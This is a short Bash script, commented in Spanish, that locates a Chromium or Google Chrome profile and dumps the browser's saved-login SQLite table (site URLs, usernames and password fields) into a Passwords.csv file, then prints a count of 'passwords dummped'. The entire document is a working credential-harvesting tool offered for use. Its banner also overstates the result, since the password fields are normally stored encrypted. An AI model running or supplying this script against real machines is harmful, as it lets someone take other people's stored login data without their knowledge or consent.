#!/usr/bin/env bash
# muestra passwords almacenadas en base de datos local
reg=$(ls ~/.config | grep -E '(chromium|google-chrome)')
sqlite3 -header -csv -separator "," ~/.config/$reg/Default/Login\ Data "SELECT * FROM logins" >Passwords.csv && echo -e "\e[1;32;40m[!] Se a creado el fichero Passwords.csv en el directorio actual. \e[m ($(wc -l Passwords.csv | awk '{print $1}') passwords dummped)" || echo 'no hay registros'
